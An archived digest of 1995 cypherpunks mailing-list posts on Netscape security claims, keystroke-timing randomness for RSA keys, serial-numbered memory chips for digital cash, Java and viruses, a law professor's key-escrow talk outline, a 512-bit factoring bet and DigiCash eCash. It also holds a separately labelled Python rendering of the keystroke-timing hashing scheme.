In-Reply-To: <9510171851.AA13486@softnc.com>
Message-ID: <30843AD9.4101@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


West Canadian Graphics wrote:
> Is Jeff or any of the other netscape posters here officially??

  I am not an official spokesperson of netscape.  What I post here
is either my opinion, my interpretation of netscape's public statements
(press releases), or my interpretation of the sentiments of my co-workers.
Obviously management know that I do spend some time reading and writing
messages on cypherpunks, but I've never been told to do it or to stop
doing it.

> Or are they here, just out of personal curiosity (without their employers
> knowledge, I mean ...) cause they have a whole lot of spare time on their
> hands to learn about cryptography and security.

  I'm here to learn and to contribute, which I think is why most
people are here.

>         - Netscape has known about this problem since last week's
>           scathing public attack and demonstration of the problem
>           which included sample code posted to the Internet??

  Which problem are you talking about?

>         - If you run and use a Netscape client, that any machine
>           anywhere in the world if it's on the Net could retrieve
>           all of the files off of your hard drive or LAN??
> 
>           Or even worse ... erase files on your Hard drive and
>           wipe you out??

  I don't believe this statement to be true.  How about the following:

	If you download a program to your computer that is infected
	with a virus, the virus could send all of the files on your
	hard disk to anyone it wants to, or it could wipe your entire
	hard disk.

  Now, what does this have to do with running netscape?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Tue, 17 Oct 95 17:29:46 PDT
To: "Martin Diehl" <cypherpunks@toad.com
Subject: Re: Using deterministic programs to select private RSA keys.
Message-ID: <aca9fb3f01021004b95f@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 10:38 AM 10/17/95, Martin Diehl wrote:
....
>     I suggest that if you capture the time in microseconds between
>     keystrokes and insert the least significant 8 bits between the
>     corresponding characters (i. e. <letter1> <time2 - time1> <letter2>
>     <time3 - time2> <letter3> ... <letter nnn> <time until double CR -
>     time nnn>) and MD5 the set of values, the resulting "random" value
>     will be different for both people who type different input texts as
>     well as those people who type the same input text.
....
Indeed, but the point of the proposal is a determinate and reproducible
program behavior so as to gain confidence that the output is correct by
comparing output of several programs.
....

>     As regards the observation that MD5 produces only a 128 bit result,
>     you could call MD5 after each nn values (at least 16) have been
>     entered.  In that way a few lines of input and associated timing
>     values could easily generate a value of the same order of magnitude as
>     the number  of 1K primes.
....
Sounds good.
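
Added example (not part of the original messages): a Python rendering of the interleave-and-hash construction quoted above, with one MD5 call per 16 values. Replaying the same recorded keystroke log always reproduces the output, so separate implementations can be compared on recorded input. The function names, the UTF-8 encoding of letters and the sample timings are assumptions constructed for illustration.

```python
import hashlib


def interleave(keystrokes, end_time_us):
    """Build <letter1> <t2-t1> <letter2> <t3-t2> ... <letterN> <t_end-tN>.

    keystrokes is a list of (character, time_in_microseconds); only the least
    significant 8 bits of each gap are kept, as the quoted proposal suggests.
    """
    next_times = [t for _, t in keystrokes[1:]] + [end_time_us]
    out = bytearray()
    for (ch, t), nxt in zip(keystrokes, next_times):
        out += ch.encode("utf-8")
        out.append((nxt - t) & 0xFF)
    return bytes(out)


def stretch(values, nn=16):
    """MD5 every run of nn values and concatenate the 128-bit digests.

    The output grows with the input, but each digest holds no more
    unpredictability than the timing bytes that were fed into it.
    """
    if nn < 16:
        raise ValueError("the proposal asks for at least 16 values per MD5 call")
    return b"".join(hashlib.md5(values[i:i + nn]).digest()
                    for i in range(0, len(values), nn))


def timeline(text, gaps_us, start_us=0):
    """Constructed recording: turn per-key gaps into (char, time) events."""
    events, now = [], start_us
    for ch, gap in zip(text, gaps_us):
        events.append((ch, now))
        now += gap
    return events, now          # 'now' is the time of the closing double CR


TEXT = "cypherpunks write code"
GAPS_A = [120_003 + 911 * i for i in range(len(TEXT))]    # constructed typist A
GAPS_B = [98_450 + 1_237 * i for i in range(len(TEXT))]   # constructed typist B


def seed_for(gaps):
    """Seed material for one recorded typing session of TEXT."""
    events, end = timeline(TEXT, gaps)
    return stretch(interleave(events, end))


if __name__ == "__main__":
    print(seed_for(GAPS_A).hex())
    print(seed_for(GAPS_B).hex())
```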






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Tue, 17 Oct 95 15:39:27 PDT
To: loofbour@cis.ohio-state.edu (Nathan Loofbourrow)
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash
In-Reply-To: <199510171820.OAA24348@colon.cis.ohio-state.edu>
Message-ID: <951017.172824.4H9.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, loofbour@cis.ohio-state.edu writes:

> And there's another item of note: each chip has a unique, etched,
> machine-readable serial number. What are the bets that Dallas
> Semiconductor can tell you who purchased that chip? Well, so much for
> an anonymous payment scheme based on *this* product.

Dallas might be able to tell who purchased them, but it's likely to have
been someone like Hamilton-Hallmark (a major parts distributor).
Whether the distributors are going to maintain the audit trail is
questionable at best.  It only takes one distributor to break the
chain of traceability, and audit trails cost money.

> * Gee, back in my day EPROMs were Erasable; these folks mean instead
>   to indicate an Electrically Programmable chip, which sounds like a
>   good old PROM to me. Ahhh, acronyms...

This comes from the fact that PROMs are typically mask-programmed at the
fabrication stage.  EPROMS are programmed in the field.  And yes, if you
could get the top of the chip off cleanly, you could erase and reprogram
them.  (not likely, and hardly undetectable, but it's ever so slightly
possible)  More often, I see these devices called OTP (for One Time
Programmable).  In the more standard types (27C256, for example),
they're a fraction of the cost of the erasable ones.  Ceramic cases and
quartz windows are spendy.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIQv0Rvikii9febJAQEeKAP+LbgyZ/60fGuVICZEqM+Rv34GhEA6a/vg
cKPbKCazUVg8bEBod3mqbHfssjDgD47PcAai8uM3ALmki/TI3DfI6FLbZr7aCpa8
PSNFDTEpmRDpnm5xpbZa/5O1aLdXLX6ps8OGsg0YjY1hvFQCn5tymW9GjhOXrkXS
s698T5nEoQI=
=LoNA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: LaurianneA@aol.com
Date: Tue, 17 Oct 95 15:34:08 PDT
To: cypherpunks@toad.com
Subject: Blacknet
Message-ID: <951017183353_126322969@emout04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Are you still up and running with Blacknet? I just need to know if you can
use some info. Message me here.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Tue, 17 Oct 95 17:07:33 PDT
To: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash
In-Reply-To: <199510171820.OAA24348@colon.cis.ohio-state.edu>
Message-ID: <199510180006.UAA16151@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Loofbourrow writes:
>And there's another item of note: each chip has a unique, etched,
>machine-readable serial number. What are the bets that Dallas
>Semiconductor can tell you who purchased that chip? Well, so much for
>an anonymous payment scheme based on *this* product.

Some enterprising cypherpunks can buy a bunch and resell 'em for cash.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 17 Oct 95 16:26:05 PDT
To: "Allen J. Baum" <baum@apple.com>
Subject: Re: Yardley's 1st ed. "Black Chamber" $25+
In-Reply-To: <v02120d08aca9ca600cea@[17.255.11.191]>
Message-ID: <Pine.3.89.9510171918.A45932-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 17 Oct 1995, Allen J. Baum wrote:

> I found one in a bookstore. I didn't buy it, but I'll go back and get it &
> ship it if someone is interested.
> 
I have the re-issued paperback, got it used last year for a few bucks, I think 
it's still in print. (Mail me if you're interested in knowing the 
publisher, I'll try to dig it up)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Tue, 17 Oct 95 17:30:19 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: java flaw
In-Reply-To: <9510171612.AA25185@all.net>
Message-ID: <199510180030.UAA16655@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes:
>> 
>> At 06:59 AM 10/17/95 UTC, jerry the golden retriever wrote:
>> > A security feature in Java scans for viruses before activating the
>> > applet.
>> 
>> I hope that this is false.

It is.  Java scans the applet to make sure it doesn't try to cheat
the interpreter into violating the object access rules.  The scanning
has nothing to do with viruses.

>> Even if one had genuine artificial intelligence, it would be impossible
>> to detect all viruses, only particular viruses and classes of virus.
>> 
>> If Java is secure, virus scanning should be unnecessary, indeed 
>> impossible, because there could be no code configuration capable
>> of acting as a virus.
>> 
>> If virus scanning occurs, then it is possible to write a virus in Java,
>> then Java is inherently insecure.
>
>To be more precise, if there is programming, sharing, and transitive
>information flow, viruses can reproduce and spread (as proven
>mathematically in the mid-1980s).  Since Java offers sharing of
>programs and (for now at least) transitive information flow, viruses
>are possible.

Java doesn't try to prevent viruses (viri?).  It doesn't even claim
such.  It *does* make claims that imply limits on what the virus can
do, though.  If the virus does no more than eat up CPU cycles, it's
fairly benign.  Java is supposed to prevent viruses that destroy files
and damage equipment.  This feature isn't restricted to viruses, though.
Even non-replicating programs aren't supposed to be able to hurt anything.

Whether they achieve this goal or not is a matter of some debate.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Tue, 17 Oct 95 20:39:40 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510171851.AA13486@softnc.com>
Message-ID: <308476FF.7815@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


> Is Jeff or any of the other netscape posters here officially??

I speak for myself. I am not an official Netscape spokescritter, and
have no desires to be one.

> Or are they here, just out of personal curiosity (without their employers
> knowledge, I mean ...) cause they have a whole lot of spare time on their
> hands to learn about cryptography and security.

I don't have a lot of spare time, but I do consider reading the
messages going to cypherpunks as part of my job. (Well at least some
of each message. :-)

> I wish one of them (or Netscape) would make an official comment to make
> sure that the record is straight, and that there is no mis-reporting.

On what topic?

>         - Netscape has known about this problem since last week's
>           scathing public attack and demonstration of the problem
>           which included sample code posted to the Internet??

I am not quite sure what problem you are talking about? NFS and MITM
ftp attacks?

>         - If you run and use a Netscape client, that any machine
>           anywhere in the world if it's on the Net could retrieve
>           all of the files off of your hard drive or LAN??
> 
>           Or even worse ... erase files on your Hard drive and
>           wipe you out??

Can you expand on this? I am not aware that any of the executables
we have shipped do this. If you get a compromised version of any
program (i.e. one that some attacker has changed) then that changed
version will do whatever the attacker has built it to do. This is not
a Netscape specific issue.

>         - Even if your machine is behind a firewall or proxy server,
>           that there is no protection??  That you can't do anything??

Firewalls and proxies help against many attacks. Without knowing
which one you mean, it's impossible to respond intelligently. (In
particular I know of no sites that allow NFS packets to cross a
firewall boundary.)

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Tue, 17 Oct 95 17:45:15 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: My chat with Goeff Greiveldinger
In-Reply-To: <9510171621.AA12393@tis.com>
Message-ID: <Pine.SUN.3.91.951017203951.13039C@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Here is my first cut at what I plan to say.   Not real exciting, but I 
don't know how much knowledge to assume in the audience.

I would be grateful for a pointer to any commercial key escrow services 
that are actually in operation today.  And doubly grateful for a pointer 
to one that does not rely on a proprietary encryption scheme and/or one 
that allows/requires key splitting for extra security.

Key Escrow in Secure Electronic Commerce 
October 19, 1995 4:30 pm - 5:50 pm 

Outline

Intro:
In this talk I will...
     *    Begin with why business wants/needs *data* CKE
     *    Turn then to law enforcement focus on communications KE
     *    Explain how govt hardball on export control in pursuit
          of Comm KE threatens needed CKE -- or at least US
          companies' share of that market...
     *    Discuss pending issues

I.   Commercial key escrow, the WHAT, WHY, WHO and HOW

     A.   WHAT 
     Give someone (internal/external) copies of keys (private/
     symmetric) used in the course of business
          1.   Essential (from corporate perspective) for
               a.   all encrypted, stored corporate data
               b.   keys with power
                    (1)  to sign things in corporate name e.g.
                         buy/sell
                    (2)  to issue certificates

          2.   Less essential (from corporate perspective)
               a.   for email keys
                    but still pretty important if you might have
                    to reconstruct exchanges of messages at a
                    later date.
               b.   for telephone keys
                    although useful if you think there will be
                    need for you and/or police to spy on your
                    employees, eg. investigate fraud/theft.

     B.   WHY
          1.   Irresponsible for corporation not to encrypt data
               and some communications if these are of commercial
               value to competitors/otherwise sensitive
          2.   Irresponsible to encrypt data (and maybe also
               communications) and not have fail-safe means of
               access
               a.   employees lose their keys
               b.   employees die
               c.   employees quit (and vanish or do some vandalism)
               d.   employees are suspected of engaging in hanky-
                    panky

     C.   WHO
          Escrow agent could be 
          1.   internal
               a.   only viable solution right now unless you are
                    satisfied with, e.g., RSA non-interoperable
                    crypto system
               b.   but are you hacker-proof?

          2.   external, e.g.
               a.   TIS licensed "Data Recovery Center" (but
                    there are none in existence today)
               b.   bankerstrust
               c.   govt agency (someday? but not today)
               d.   can use split key systems for increased
                    security. [but is anyone actually offering such a 
                    service?]

          One problem with external is that NONE of the liability
          issues are resolved.  E.G.  Suppose private escrow
          agent complies in good faith with facially valid
          warrant, but warrant is l

     D.   HOW
          Here we have more doubts than knowledge
          Not clear yet what security precautions commercial
          escrow agents will offer.  Can assume:
          1.   Secure systems
          2.   Contract-driven mechanism for verifying IDs/bona
               fides of persons attempting to take out data
          3.   Contract-driven assurances of speed of response
          4.   split key systems with different escrow agents?


II.  Legal implications of commercial key escrow

     Three families of issues: 
          1.   data owner liability for not escrowing
          2.   escrow agent liability for errors
          3.   Government access to keys

     A.   It is irresponsible NOT to escrow keys if you encrypt
          data.  And it is increasingly irresponsible not to
          encrypt.  Hence some form of escrow will become
          practically mandatory.
          1.   Query: won't this make it easier for the
               government to get access to my data?  

               Answer: must distinguish between stored data and
               communications.   You are escrowing the keys not
               the data itself.  The data remains secure in your
               own machine/tape/safe/whatever.  There it's
               subject to subpoena just like paper records.  So
               encryption + escrow is no substitute for
               destroying the smoking gun, but it's also no more
               danger than ordinary records.

               Escrowing keys used for communication makes those
               communications more vulnerable to government
               interceptions.  Strong, unescrowed, keys may
               defeat even a lawful subpoena for a wiretap. 
               Escrowed keys are vulnerable to legal (at least)
               wiretaps.  

          2.   More on "practically mandatory":  The government
               may make it a condition of doing certain kinds of
               business, e.g. govt contracting, that only
               escrowed encryption be used.   Similarly, the
               government may be willing to engage in secure
               communications with the public, but only via
               systems that are limited to escrowed keys.

          3.   Still more on "practically mandatory": carrot &
               stick of export controls (see below).

     B.   Escrow agent liability for errors

          Currently, rights and resp of customer vs. escrow
          agents depend on whether escrow agent is public or
          private

          1.   Public escrow agent -- low accountability?

     In the "Clipper 1" proposals, the escrow system lacked any
legal guarantees for the people whose keys are generated by the
government and held by the escrow agents.  Indeed, the Attorney
General's escrow procedures stated that they 
     do not create, and are not intended to create, any
     substantive rights for individuals intercepted through
     electronic surveillance.  
In short, the government disclaimed in advance any reliance
interest that a user of an EES-equipped device might have in the
government's promise to keep the key secret.  A victim of an
illegal wiretap would have a cause of action under Title III
against the wiretapper, but, it appears, no remedy against the
escrow agents, even if the escrow agents acted negligently or
failed to follow their own procedures.  The Attorney General's
procedures themselves are merely directives.  They are not even
legislative rules, which might be subject to notice and comment
restrictions before being rescinded.  A future administration
could, if it wanted, secretly instruct the escrow agents to
deliver copies of the keys to an intelligence or law enforcement
agency, or even White House plumbers, thereby violating no law
or regulation (the plumbers, though, would violate Title III when
they used the information).  Because the chip-unique keys were
voluntarily disclosed to the government, the chip's owner might
lack a legitimate (that is, enforceable) expectation of privacy
in the information. 

     If the intercepted communication were an e-mail or a file
transfer, rather than a telephone call, the chip owner subject to
an illegal or inadvertent disclosure by the escrow agents may be
in a particularly weak position if the information ever makes its
way to court:  many Title III protections granted to voice
communications do not apply to transfers of digitized data.

     Shortly before the 103d Congress adjourned, Congressman
George Brown introduced the Encryption Standards and Procedures
Act of 1994, which would have waived the sovereign immunity of
the United States for willful but unauthorized disclosures of
key fragments by its officials and excluded liability in all
other circumstances.  In the absence of similar legislation,
however, there may currently be no monetary remedy even for a
willful disclosure.

          2.   Private escrow agent -- contract accountability,
               tort, maybe bailee/trustee (dubious)

     If you want software key escrow today, you have to be your
own escrow agent, or go to a private escrow agent because there
is no government agency ready and able to act in this capacity
(and few private bodies!)  Given current liability rules, you
would be better off with a private body than the government
anyway (tradeoff: maybe more security in government agency (?)
vs. more recourse against private party).

     The "son of clipper" trial balloon floated this fall
suggested that export permission would be given to (relatively)
strong (i.e. 64 bit max) software cryptosystems, if those systems
were designed to ensure that the keys were escrowed with an
"approved escrow agent".  NIST solicited comments in Sept. '95 as
to 
               a.   what sort of bodies would be suitable, and 
               b.   what terms and conditions should govern the
                    escrow agents.  
               c.   What procedures need to be developed for the
                    storage and safeguarding of keys?
               d.   Performance criteria (e.g., around-the-clock
                    availability, accessibility, reliability,
                    etc.) for approved key escrow agents?
               e.   Under what circumstances will key escrow
                    agents in foreign countries be approved?
               f.   Should approval of key escrow agents be tied
                    to a public key infrastructure (for digital
                    signatures and other purposes)?  
     [The last point is potentially ominous...if access to
     digital signature infrastructure is conditioned on using KE,
     then this makes export control hardball look like small
     beer]

     To date there has been no public feedback from NIST
subsequent to the meeting except that they are revising the
criteria in light of what they heard.  [Can GG tell us more?]


     C.   Government access to keys

          NB that government seems primarily interested in
communications; business main focus is/should be DATA.

     Now with "Son of Clipper" (software KE), the government has
relaxed the suggestion that keys be generated and escrowed via
hardware (e.g. Fortezza), but has substituted onerous criteria it
hopes it can persuade (threaten?) industry to apply to software,
including:


III. (Mostly specious) Arguments Against Commercial Key Escrow
[with apologies to Marc Rotenberg, Electronic Privacy Information
Center, who posted the quoted material to USENET several months
ago]

     A.   Bad for business
          1.   "Increased network vulnerability.  The key escrow
               configuration necessarily increases the likelihood
               of communications compromise and improper
               interception by third parties. Computer crime will
               skyrocket."

               Very unrealistic and alarmist.  While as a
               theoretical matter it is clearly true that
               sharing the keys with the escrow agent must create
               an avenue of attack that did not exist before, the
               risk can be very greatly reduced by 
               a.   key splitting (never send the whole key to
                    anyone at any time)
               b.   secure communications with very secure
                    algorithms between escrow agent and customer
                    [NB that US government export policy
                    implicates this to the extent it makes strong
                    crypto non-exportable]

          2.   "Policy incoherence.  The key management needs of
               business differ sharply from the real-time
               intercept plans of law enforcement. The latter has
               little to do with the former."

               Probably true, but irrelevant to the matter at
               hand: business needs escrowing for its own
               disaster recovery needs.

          3.   "Complexity.  Has anyone really given thought to
               how many communications will be encrypted in 20
               years and what the key management requirements
               will be to develop a unitary key escrow system to
               satisfy the government's concerns?"

               Maybe, maybe not.  But businesses need CKE now. 
               Keys don't live for ever, and a sound security
               plan will include provisions for retiring keys as
               they age.  Age makes keys vulnerable
               a.   technological change makes bruting longer
                    keys possible
               b.   the longer the key is out there the more time
                    attackers have to brute (or otherwise
                    compromise) the key

     B.   Bad for civil liberties

          1.   "Emergency circumstances taps.  The current
               wiretap law permits the initiation of a wiretap
               *without court order* upon a certification that
               emergency circumstances exist. If this procedure
               is built into the CKE procedure, then there will
               be *no judicial review* prior to the disclosure of
               keys."

               True.  But these taps are currently rare, and
               limited to cases like kidnapping where lives are
               at stake.  It's fairly unlikely that a business
               will ever encounter one of these.


          2.   "The future of PGP.  Will PGP and other non-escrow
               schemes be permitted if CKE is adopted? What will
               be the implications for developers and companies
               in the communications industry?"

               Voluntary CKE in and of itself is not going to
               affect the legality of alternative un-escrowed
               crypto.  The politics are hard to predict: one can
               imagine arguments that mandatory escrow is not
               needed because it's being done voluntarily; and
               also arguments that the increasing voluntary CKE
               means that there's less reason not to make it
               mandatory.   My guess: no great effect one way or
               the other.  The issue will be settled by larger
               things e.g. what's more scary -- Oklahoma City or
               Ruby Ridge?

IV.  Recent Developments in key escrow

     A.   NIST initiatives

          NIST is currently putting "final touches" on draft
          export criteria, under auspices of inter-agency working
          group. NIST hopes to "notice" revised draft criteria in
          fed register, perhaps within the next month; then a
          60-day comment period, with a 1-day live meeting in DC
          sometime during the comment period.


          When NIST has final version of inter-agency
          recommendations set, they will be turned over to the
          state dept to implement; state can do what it likes. 
          One possible model for State Dept. action is a change
          to the ITAR.

V.   Outstanding Issues
     A.   Why would any foreign company use US govt approved
          crypto in light of new focus on economic intelligence,
          e.g. Japan spy case?
          Possible govt responses:
          1.   foreign govt might have copy of key?  share key?
          2.   foreign-based, but US-approved, escrow agent might
               hold/share key

     B.   MANDATORY CKE?
          1.   Legislation?
          2.   "milder variants"
               a.   export control club (is 64 bits enough?)
               b.   data vs. communications issue
               c.   Digital signature infrastructure access club
                    (informal talks suggest this is not likely,
                    but not formally ruled out....)

     C.   Enabling ("technical") legislation
          1.   Title III exemption for escrow agent
          2.   Authority to "certify" escrow agents
          3.   liability rules for escrow agents

     D.   Enabling regulations
          1.   Care & feeding of escrow agents, 
               a.   eg. sample criteria for being approved and/or
                    sample contract between government and escrow
                    agent
               b.   performance criteria for escrow agents e.g.
                    response time

     E.   Liability in the absence of legislation
          1.   First, find someone actually selling escrow
               services with an interoperable product.
          2.   Or, resign yourself to eg RSA keys.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 17 Oct 95 18:02:12 PDT
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash
In-Reply-To: <199510180006.UAA16151@universe.digex.net>
Message-ID: <Pine.3.89.9510172053.A73291-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 17 Oct 1995, Scott Brickner wrote:

> Nathan Loofbourrow writes:
> >And there's another item of note: each chip has a unique, etched,
> >machine-readable serial number. What are the bets that Dallas
> >Semiconductor can tell you who purchased that chip? Well, so much for
> >an anonymous payment scheme based on *this* product.
> 
> Some enterprising cypherpunks can buy a bunch and resell 'em for cash.
> 
And then sell the serial address for cash.
How do I know that they (this means YOU! :> ) don't work for the company?
(which is a contractor for, blackmail-victim of, tentacle of NSA, CSE, 
TCMAY, Purplenet, your fairy-stepmother ...)

Of course there's always the mail-drop & forward-net... (anyone know
maildrop company addresses, the possible (il)legality of these things or 
any reported monitoring cases? A physical remailernet might come to matter in an
economy where the "split" between an untaxable info economy and a 
taxable physical economy becomes pronounced. Though it's kinda hard to encrypt
and reorder packages.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 17 Oct 95 18:20:51 PDT
To: cypherpunks@toad.com
Subject: if-comp: Project to make Fact true (fwd)
Message-ID: <Pine.3.89.9510172119.A28171-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


This is something I got off the Idea Futures computers list.
(The Fact claim is that a 512 bit number will be factored by '97)
I don't know if the following address has been posted here before. 

---------- Forwarded message ----------
Date: Tue, 17 Oct 95 13:45:40 PDT
From: Robin Hanson <hanson@hss.caltech.edu>
To: if-comp@merak.com
Subject: if-comp: Project to make Fact true


A team at Bellcore seems to be planning to try and make the claim Fact true.
See this web page, and the forward in particular:

   http://kayak.npac.syr.edu:2008/ 

They plan to use the web to allow lots of machines to easily participate.
They will start with a 130-digit number and work their way up to the
155-digit number required to satisfy the claim.

Will they succeed by the end of '97?  A crypto expert friend of mine
claims their chances are 90%.  I have bet accordingly.

Robin Hanson  hanson@hss.caltech.edu  http://www.hss.caltech.edu/~hanson/
818-683-9153  2433 Oswego St., Pasadena, CA  91107   FAX: 818-405-9841
818-395-4289  Div. Hum. & Soc. Sci. 228-77 Caltech, Pasadena, CA 91125





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Tue, 17 Oct 95 18:39:15 PDT
To: williams@va.arca.com
Subject: Re: Security Spectra (Oops)
Message-ID: <Pine.3.89.9510172141.F23956-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: 17 Oct 1995 14:13:10 GMT
From: Jeff Williams <williams@va.arca.com>
To: cypherpunks@toad.com
Subject: Re: Security Spectra

P.J. Ponder writes:

> In your recent post to the cypherpunks mailing list you proposed a 
> taxonomy of security weaknesses and vulnerabilities, adding that these 

Please watch your attribution.  Vlad Nuri proposed this rating scheme.

Oops.  Sorry about that.
-------------------------------------------------------------------------
On another matter, what's wrong with Mr. W of NetScape Communications 
subscribing to this list, maybe even posting once in a while if he feels 
like it, and in general just being a list subscriber like the rest of 
us?  Remember, as Mr. PM says - 'It's not a group, it's a mailing list'.
Mr. Weinstein's sig file says his posts are his own opinions, anyway.  
NetScape biggies have certainly posted on this list before and probably 
will again when they have something they want to send to the list, like a 
press release.  Cut Jeff some slack. (apology to international readers, 
that's an Americanism for quit busting his chops.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 17 Oct 95 18:42:04 PDT
To: cypherpunks@toad.com
Subject: Re: if-comp: Project to make Fact true (fwd)
In-Reply-To: <Pine.3.89.9510172119.A28171-0100000@aix2.uottawa.ca>
Message-ID: <Pine.3.89.9510172143.A54217-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


This is the exact wording of the claim from my previous post (there are 
also a few other crypto claims being traded).

   Fact [comp]
   512 Bit number factored by '97
   
   Before 1997 GMT a number of the following form will have been
   factored. The number must be at least 512 bits long, and be the
   product of two primes, each at least 200 bits long. The factoring
   method must not rely on any special properties of the number (except
   the fact that there are only two factors). In particular, if the
   factors were chosen by the group doing the factoring, then the
   technique must not have used any information about the particular
   factors chosen. The result must be published in a reputable journal.
   The paper must include a description of how the factoring was
   accomplished. The result must be reproducible, at least in theory (it
   need not have been reproduced). To be judged one year later to allow
   time for publication. Note: 512 bit number means number >= 2^511. A
   project to factor 512 bit number might not qualify because the factors
   are too small or there are 3 factors. They will know before you. 
   
   Owner: loki@nately.ucsd.edu, Wording changes allowed by Owner
   
   Posted to: sci.crypt, Interval: monthly
   
   Judge by: TBD on 98/1/1
   
   
   Meta Disclaimer: this is not real money (all other disclaimers are
   superfluous)...
   Mark James (jamesm@skyler.arc.ab.ca)
   Last update Monday, 16-Oct-95 03:01:27 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 17 Oct 95 21:56:33 PDT
To: karlton@netscape.com (Phil Karlton)
Subject: Re: Netscape rewards are an insult
In-Reply-To: <308476FF.7815@netscape.com>
Message-ID: <199510180451.VAA23663@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I am not quite sure what problem you are talking about? NFS and MITM
> ftp attacks?

	This character has been going on and on regarding some big
hole he apparently found in netscape, but no one else on the list
seems to have noticed anything, or replicated any alleged claims he
may have made. Maybe if the person in question would repost this
alleged post describing some massive hole, it would help us all.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Tue, 17 Oct 95 15:31:57 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510110939.FAA26747@pipe4.nyc.pipeline.com>
Message-ID: <199510172229.PAA07421@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Oct 1995 05:39:04 -0400, you wrote:

>   The New York Times, October 11, 1995, pp. A1, D3.
>

Does anyone know if the paper that spurred this article is online, and
if so where?


Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 17 Oct 95 20:09:22 PDT
To: cypherpunks@toad.com
Subject: Re: [ANNOUNCEMENT] eCash reality !!
Message-ID: <199510180307.XAA23559@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <3R85cD1w165w@berserk.com>, usura@berserk.com (Alex de Joode) wrote:

> e-WAVE [issue 42], a dutch language electronic newsletter
> published by Riverland Publications, reports that DigiCash 
> has reached agreement with a big US bank to make eCash real. 
> 
> DigiCash promised the 'scoop' to Newsweek, so in next monday's 
> issue of Newsweek we will know wich bank that is. (They are also 
> said to be talking with a Dutch or Belgian bank or financial 
> institution). 
> 
> Since there has been cut a deal with the monetary powers I wonder 
> if we get the whole anonymous ecash or a 'diluted spieces'.

